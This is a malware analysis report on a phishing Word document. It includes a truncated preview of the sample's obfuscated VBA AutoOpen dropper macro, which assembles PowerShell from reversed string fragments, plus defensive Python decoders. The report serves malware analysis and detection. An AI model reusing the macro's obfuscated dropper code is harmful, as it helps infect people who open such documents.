Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6d0e9022ce78eab8…

MALICIOUS

Office (OLE)

Size: 99.0 KB (101,376 bytes)
Created: 2018-02-07 21:29:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 0429f5f6a474e76de1c3f5a7c82ce27b
SHA-1: b51d6891e07ce8b2d079d7bb47bdbf50f8fadff9
SHA-256: 6d0e9022ce78eab8cb26333a5664d7210c82254903e352f2ccad5fa5b90a143d
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1203 Exploitation for Client Execution

The sample is a Word OLE document carrying a VBA project (module SjfNhTcsXmZi) whose AutoOpen subroutine runs as soon as the document is opened with macros enabled. The macro body is padded with arithmetic over variables that are never assigned, made harmless by On Error Resume Next, and assembles its real content at runtime from string literals passed through StrReverse() and Mid(). Reversing those literals recovers PowerShell tokens such as [chAr], [sTrINg], -crepLaCE and env:Public, so the Shell() call flagged below is most likely launching a PowerShell stager; AutoOpen passes the result of BCjHwJisim() to a second procedure, KmtOwvuIj, through Application.Run, and that procedure is not in the preview. The ClamAV signature Img.Dropper.PhishingLure-6443153-0 matches a known phishing-lure dropper family. The T1203 mapping rests only on the unaccounted-for slack region reported below; no parser exploit was identified in this analysis.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 101,376 bytes but its declared streams total only 24,689 bytes — 76,687 bytes (76%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Note that this arithmetic is simply file size minus declared stream sizes, so the 76,687 bytes also include the header, FAT and directory sectors and each stream's rounding up to a sector boundary; it is an upper bound on hidden data, and the region should be carved and inspected before any exploit attribution is made.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: the statement that no VBA project was recovered conflicts with the macros.bas artifact extracted below; the marker here is almost certainly the VBA AutoOpen subroutine already reported under OLE_VBA_AUTOOPEN, so treat this finding as corroborating rather than independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This URL is the standard DrawingML XML namespace identifier that ordinary Office documents carry; it is not a network indicator and is not worth blocking or hunting.
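The OLE_SLACK_ANOMALY figure above (file size minus the stream sizes declared in the directory) is easy to reproduce independently, and worth reproducing because the heuristic's number is an upper bound. The following is an added example, not code from the report or from oletools: it parses the Compound File Binary header, FAT and directory with the standard library, returns both the heuristic's figure and the stricter count of sectors the FAT leaves unallocated, and builds a constructed sample file (invented filler appended after the last allocated sector) to run against. For a real sample call ole_slack_report(open(path, "rb").read()).

```python
"""Reproduce the OLE_SLACK_ANOMALY arithmetic on a Compound File Binary (OLE2) image.

Added example; not part of the report or of oletools, standard library only. FAT
sectors are located from the header DIFAT alone (109 FAT sectors, about 7 MB of
512-byte sectors), which covers a 99 KB document comfortably.
"""
import struct

MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
FREESECT, FATSECT, ENDOFCHAIN, NOSTREAM = 0xFFFFFFFF, 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
STGTY_STREAM, STGTY_ROOT = 2, 5


def ole_slack_report(data: bytes) -> dict:
    """Compare declared stream bytes with the file size (the report's figure) and
    also count sectors the FAT leaves free (the stricter 'unallocated' figure)."""
    if data[:8] != MAGIC:
        raise ValueError("not an OLE2/CFB file")
    sector_shift = struct.unpack_from("<H", data, 0x1E)[0]
    sector_size = 1 << sector_shift
    first_dir = struct.unpack_from("<I", data, 0x30)[0]

    # Sector n starts at byte (n + 1) * sector_size; the header occupies "sector -1".
    fat = []
    for fat_sect in struct.unpack_from("<109I", data, 0x4C):
        if fat_sect == FREESECT:
            break
        fat.extend(struct.unpack_from("<%dI" % (sector_size // 4), data, (fat_sect + 1) * sector_size))

    # Follow the directory chain and add up the size of every stream entry (type 2).
    declared, sect, seen = 0, first_dir, set()
    while sect < len(fat) and sect not in seen:
        seen.add(sect)
        base = (sect + 1) * sector_size
        for i in range(sector_size // 128):
            entry = data[base + i * 128: base + (i + 1) * 128]
            if len(entry) == 128 and entry[66] == STGTY_STREAM:
                size = struct.unpack_from("<Q", entry, 120)[0]
                if sector_shift == 9:            # v3 files: only the low 32 bits are valid
                    size &= 0xFFFFFFFF
                declared += size
        sect = fat[sect]

    num_sectors = len(data) // sector_size - 1
    allocated = sum(1 for i in range(min(num_sectors, len(fat))) if fat[i] != FREESECT)
    slack = len(data) - declared
    return {
        "file_size": len(data),
        "declared_stream_bytes": declared,
        "slack_bytes": slack,                     # the heuristic's number; includes header/FAT/directory
        "slack_pct": round(100 * slack / len(data)),
        "unallocated_bytes": (num_sectors - allocated) * sector_size,
    }


def build_sample_ole(stream_size: int = 100, junk_sectors: int = 5) -> bytes:
    """Constructed input: a minimal v3 compound file with one stream, followed by
    junk_sectors of filler that no FAT entry references (the slack the heuristic flags)."""
    ss = 512
    hdr = bytearray(ss)
    hdr[:8] = MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)  # minor, major 3, byte order, 512 B sectors, 64 B mini
    struct.pack_into("<II", hdr, 0x2C, 1, 1)                      # one FAT sector; directory chain starts at sector 1
    struct.pack_into("<III", hdr, 0x38, 4096, ENDOFCHAIN, 0)      # mini-stream cutoff; no mini FAT
    struct.pack_into("<II", hdr, 0x44, ENDOFCHAIN, 0)             # no DIFAT sectors beyond the header
    struct.pack_into("<109I", hdr, 0x4C, 0, *[FREESECT] * 108)    # the FAT itself lives in sector 0

    fat = [FREESECT] * (ss // 4)
    fat[0], fat[1], fat[2] = FATSECT, ENDOFCHAIN, ENDOFCHAIN      # 0 = FAT, 1 = directory, 2 = stream data
    fat_sector = struct.pack("<%dI" % (ss // 4), *fat)

    def dir_entry(name: str, etype: int, start: int, size: int) -> bytes:
        e = bytearray(128)
        raw = name.encode("utf-16-le") + b"\x00\x00"
        e[:len(raw)] = raw
        struct.pack_into("<HBB", e, 64, len(raw), etype, 1)      # name length, object type, colour
        struct.pack_into("<III", e, 68, NOSTREAM, NOSTREAM, 1 if etype == STGTY_ROOT else NOSTREAM)
        struct.pack_into("<IQ", e, 116, start, size)              # starting sector, stream size
        return bytes(e)

    dir_sector = (dir_entry("Root Entry", STGTY_ROOT, ENDOFCHAIN, 0)
                  + dir_entry("WordDocument", STGTY_STREAM, 2, stream_size)
                  + bytes(ss - 2 * 128))                          # two unused (type 0) entries
    stream_sector = (b"\x01" * stream_size).ljust(ss, b"\x00")
    junk = b"\x90" * (ss * junk_sectors)                          # constructed filler no FAT entry points at
    return bytes(hdr) + fat_sector + dir_sector + stream_sector + junk


if __name__ == "__main__":
    print(ole_slack_report(build_sample_ole()))
```

On a real sample compare unallocated_bytes with slack_bytes: the header, FAT, directory and mini-FAT sectors plus per-stream sector rounding account for the gap between the two, and it is the unallocated region, not the heuristic's headline figure, that deserves carving and entropy or XOR-key analysis.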

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  22,937 bytes
SHA-256: 3ce3b60d73c2a9f803d68d85d72b1c4128e9a83bc9aa608ce6e7a177cd5bba5b
Preview of the extracted script (first 1,000 lines)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SjfNhTcsXmZi"
Sub AutoOpen()
On Error Resume Next
vXwPjfBTi = NGUPQtGGlrz - KEvKnUO / (1722276 + XSdXqUnMR - 8352868 + MVYcpobPSizk)
IuNuUVshE = NpnqraYTuT - NopjSVwswqlYhU / (5573964 + aTrZJimHiow - 9472217 + qzkjlvF)
YOBztpGjc = FWOzwADtp - BhzdXBqHqBrw / (4924884 + EMRrfUYDfQ - 6755718 + iEszjmvMErQ)
Application.Run "KmtOwvuIj", BCjHwJisim
XbswwsbZI = rsmiLOVKwBhuvS - PrUFBNSNvuQm / (4301292 + KEqafrLGRV - 4603841 + BFpjcfaMjBG)
UHjYfqnvb = lnwqUQbaIazhbM - XMSkMKpJw / (4332587 + wSjPdawbP - 3482832 + sHOwmbbHmfWLI)
End Sub
Function BCjHwJisim()
On Error Resume Next
WwwEVZoAd = RzjbCBShwASuC - UPEQMsuvEwBr / (2446531 + iAURiGQ - 179109 + QbItjdpElC)
Gjkwvjb = GzIPPtuWvk - LoMCwjBMvST / (8273896 + pEzOSOrPpozjr - 965767 + oMuFopP)
nhswkX = jdjJDYGFnG - ZLufDhsLWA / (2373723 + FbwYjYNCzZ - 7004458 + llEnqiiMZ)
bczCkKPFUG = qXjFIaNMfbm + Mid(StrReverse("lYLoUhOamVFqJwobfjIOj3]RahF"), 2, 5)
MGjRoOKUfN = GbhEAXhZEX - abuRcEUnRzwivH / (5851398 + hpGTjRw - 5850264 + XjqLAnVz)
CrFiP = QSlZwrKGBUKs - zVUAkzETJdQH / (956679 + dcRMbjPrLR - 1468899 + OIZQdURllVrAD)
qBWZUqj = uNHpVSrWji - IjJWGJCsqjvt / (8700568 + wpTjIkRJDoCjWv - 7948236 + sbvjUkI)
pHUMNNlLjvj = frujrYwitT + Mid(StrReverse("JksjLjOSTXjddTwtZjkrMXSCjLMBL8moc'+'.21Usj+UsjrYL8+YL8eYL8+YL8velYL8+YL8jwvNRZCi"), 9, 44)
QupORcVz = ZdXmYtTzfUUWn - DoqTwNfL / (6222468 + DwwJwPp - 6605275 + jWMiFDCNVF)
uiihYTifQ = uJXhDXzjVAKNw - jbwJCQfmA / (1419397 + rKlQvAJGsKuZ - 2943914 + ZRJMVVI)
ZzJmc = LWbFDToII - QvMNLPZA / (239942 + EJpChCcw - 4277586 + fldczPoqwp)
jmJzGiaFO = fLoHMozTO + Mid(StrReverse("ztXwasoY'+'L8+YL8roigelocVzZ+VzZ/'+'YL8+Y'+'L8/'+':ptYKDLzoidjNwCwJjotGrFmA"), 22, 50)
AOLhclMrL = UUAKChZXAqqm - iiSjNwbiELpV / (1412921 + sOIQsdm - 2079922 + cRwiPTvzb)
OjipEwTf = SGiAKwJREQJKou - jJsazJwTNqS / (3254119 + LPJMOZozO - 2611950 + RiLiuHRcCFjKCY)
csiqY = mWnRKrhvFoG - wPGiRvuIPwOYGY / (8092354 + IcFGnkmSK - 9433969 + GknFunK)
DjzYsrlzft = jBkJTuMGt + Mid(StrReverse("FNc[]gNIrTs[,'BZKzdomUwqmqnMENrzojLAPRu"), 24, 14)
kajVusIp = LmBSndjAJ - cnUUsnYb / (8720855 + kvCdThLqzX - 4339015 + KwlRERzbKnAKkH)
oBESW = wWVsmuod - jYzFRsDmo / (5788957 + YibiGbRJzur - 8663065 + aPUcikDV)
NIOAwODAHj = WhjRuKSjO - GiiNumlKdf / (6205892 + rfofCXbHEa - 1507507 + MtCohHq)
OizqvwAqN = MvaROIQOoI + Mid(StrReverse("NOQIwpsGMvHVYpCVRHCfVzZUsjVzZ EC'+'aLperc-421]rAhc[,VzZ8r'+'xVzZ  ECa'+'Lperc-63]rAhc[,)55]'+'rAhc[+58]rAhc[+9'+'4]rAhc[(  ECaLperc-  )VzZ)UsjXVzZ+VzZUsj+]5[cilbuP:vne7UPv"), 3, 149)
rKPsjqzQYa = aqlBqAdOHv - GRfWcABj / (9302188 + VoSoVsHnAzk - 2714937 + zRULDBLTzvF)
bLwShhzo = EHKOBYGzzE - TMUIVaG / (9494904 + smjFIowhkJ - 4240339 + MPRlwZzZiQhuPA)
CXbGNL = itqstzihRaFFMZ - MniIGzCXYB / (1429171 + tbElpIpPnu - 3232388 + wihAKrTmzFE)
piVMAD = jVnjrBZqt + Mid(StrReverse("ifw)'+'(YL8+YL8yt9gNnYL8+YL8mXUsj+UsjinmXrtSYL8+YL8'+'VzZ+VzZoTyt9.cfsaYL8+YL8n3aYL8+'+'YL8(ytYL8+YL89elUsj+UsjYL8+YUsj+UsjL8Usj+UVzZ+VzZsjnmXYUsj+UsjL8+YL8IFdYLMvXZcEFB"), 10, 157)
zlWZtjR = zWKlRWFMc - BMhiUYoXK / (4893446 + PnjRdarWpboV - 5366420 + QoTmXGvRmi)
FDSHwMGpn = jIRBAiBP - hjbTowOqmnNr / (1055846 + EjUknTnw - 187768 + HtRaUpt)
NiipFju = FvojNzzarEiw - SiwMSjzNw / (8608628 + iWMvfoVzualK - 4543090 + VUnNbiTCoo)
SWnvIot = MHtCjWRqlZoFMp + Mid(StrReverse("njjdAEcVz'+'Z+VzZ,YL8+YL8sbGGuk"), 7, 18)
cUZwkvd = qnCuDjhDpjUYow - KAVJQjiY / (6166643 + aTozBdHT - 4940651 + hkSXzmwwHuw)
HdTzXI = FwkZnsoSHO - kcPsEoDMFP / (3395546 + ZhzKdhkQlOC - 2862742 + OcqPiHXSOhuku)
qQKfTf = KDiqJnRLrpiKkX - lWaAApLNzaHuML / (9902828 + ZjnaNCX - 8529688 + aDkAjUXzUdL)
oBOIsdz = VNBIvZICE + Mid(StrReverse("ZWWEVfLbvZHj+XaQLRuz"), 5, 5)
fMaSwvlw = smIbzwkiwiYama - QGkurioi / (8031813 + icXRIqiUDsOXt - 4986889 + kuMmLTS)
HslHTFkGzQK = dUJRwOREDS - OUNRqsqFihzt / (2535576 + sGnbwiV
... (truncated)
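The only lines in the preview that do real work are the Mid(StrReverse("..."), start, length) assignments; everything else is arithmetic over undefined variables, silenced by On Error Resume Next. The following is an added example, not code from the report or from oletools: it emulates the two VBA string functions the macro relies on (StrReverse reverses; Mid is 1-indexed and clips at the end of the string), applies them to the literals copied from the preview above, and flags PowerShell tokens in the result. The MACRO_EXCERPT is those preview lines with the padding lines left out.

```python
"""Recover the string fragments the AutoOpen macro builds with Mid(StrReverse(...)).

Added example; not part of the report, the sample, or oletools. Variables such as
qXjFIaNMfbm are never assigned anywhere in the macro, so under On Error Resume Next
they evaluate to Empty and each assignment reduces to the Mid(StrReverse(...)) result.
"""
import re

# Copied from the macro preview. The arithmetic-only lines are omitted: they reference
# undefined variables and exist only to pad the code.
MACRO_EXCERPT = '''
bczCkKPFUG = qXjFIaNMfbm + Mid(StrReverse("lYLoUhOamVFqJwobfjIOj3]RahF"), 2, 5)
pHUMNNlLjvj = frujrYwitT + Mid(StrReverse("JksjLjOSTXjddTwtZjkrMXSCjLMBL8moc'+'.21Usj+UsjrYL8+YL8eYL8+YL8velYL8+YL8jwvNRZCi"), 9, 44)
jmJzGiaFO = fLoHMozTO + Mid(StrReverse("ztXwasoY'+'L8+YL8roigelocVzZ+VzZ/'+'YL8+Y'+'L8/'+':ptYKDLzoidjNwCwJjotGrFmA"), 22, 50)
DjzYsrlzft = jBkJTuMGt + Mid(StrReverse("FNc[]gNIrTs[,'BZKzdomUwqmqnMENrzojLAPRu"), 24, 14)
OizqvwAqN = MvaROIQOoI + Mid(StrReverse("NOQIwpsGMvHVYpCVRHCfVzZUsjVzZ EC'+'aLperc-421]rAhc[,VzZ8r'+'xVzZ  ECa'+'Lperc-63]rAhc[,)55]'+'rAhc[+58]rAhc[+9'+'4]rAhc[(  ECaLperc-  )VzZ)UsjXVzZ+VzZUsj+]5[cilbuP:vne7UPv"), 3, 149)
piVMAD = jVnjrBZqt + Mid(StrReverse("ifw)'+'(YL8+YL8yt9gNnYL8+YL8mXUsj+UsjinmXrtSYL8+YL8'+'VzZ+VzZoTyt9.cfsaYL8+YL8n3aYL8+'+'YL8(ytYL8+YL89elUsj+UsjYL8+YUsj+UsjL8Usj+UVzZ+VzZsjnmXYUsj+UsjL8+YL8IFdYLMvXZcEFB"), 10, 157)
SWnvIot = MHtCjWRqlZoFMp + Mid(StrReverse("njjdAEcVz'+'Z+VzZ,YL8+YL8sbGGuk"), 7, 18)
oBOIsdz = VNBIvZICE + Mid(StrReverse("ZWWEVfLbvZHj+XaQLRuz"), 5, 5)
'''

# VAR = OTHERVAR + Mid(StrReverse("literal"), start, length)
MID_STRREVERSE = re.compile(
    r'(\w+)\s*=\s*\w+\s*\+\s*Mid\(StrReverse\("([^"]*)"\),\s*(\d+),\s*(\d+)\)'
)

# Tokens that identify the assembled text as PowerShell, matched case-insensitively.
POWERSHELL_TOKENS = ("-creplace", "[char", "[string", "env:public")


def vba_strreverse(s: str) -> str:
    """VBA StrReverse: reverse the string."""
    return s[::-1]


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid: start is 1-based; a length running past the end is clipped, as in VBA."""
    return s[start - 1:start - 1 + length]


def recover_fragments(vba_source: str) -> dict:
    """Map each assigned variable to the fragment its Mid(StrReverse(...)) call yields."""
    return {
        var: vba_mid(vba_strreverse(literal), int(start), int(length))
        for var, literal, start, length in MID_STRREVERSE.findall(vba_source)
    }


def powershell_hints(fragments: dict) -> list:
    """Known PowerShell tokens present anywhere in the recovered fragments."""
    joined = "".join(fragments.values()).lower()
    return sorted(tok for tok in POWERSHELL_TOKENS if tok in joined)


if __name__ == "__main__":
    frags = recover_fragments(MACRO_EXCERPT)
    for var, frag in frags.items():
        print(f"{var:<16} {frag!r}")
    print("PowerShell tokens:", powershell_hints(frags))
```

The recovered pieces read as PowerShell with the quoting deliberately broken up: the repeated three-letter tokens (8LY, jsU, ZzZ/VzZ-style runs) and the '+' joins are what the -crepLaCE and [chAr] expressions most plausibly rewrite into quote characters at runtime. Confirming the final command line needs the body of KmtOwvuIj, the procedure AutoOpen invokes through Application.Run, which lies beyond the truncated preview; the safe way to obtain it is to dump the full macros.bas artifact and continue this static emulation rather than executing the document.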